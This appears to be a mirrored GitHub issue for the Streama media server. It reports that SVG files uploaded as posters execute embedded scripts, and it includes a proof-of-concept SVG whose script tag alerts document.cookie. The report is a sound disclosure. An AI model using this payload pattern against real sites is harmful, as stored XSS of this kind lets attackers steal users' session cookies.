streamaserver/streama

XSS in the Upload Poster feature using an SVG image

Open

#1,088 建立於 2021年9月13日

在 GitHub 查看
 (0 留言) (1 反應) (0 負責人)JavaScript (9,565 star) (977 fork)batch import
BugHelp wanted

描述

If uploading a SVG file in the poster file browser containing a script tag, this script tag will be executed when opening the file. example file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" id="mysvg">
<script>
alert(document.cookie);
</script>
</svg>

貢獻者指南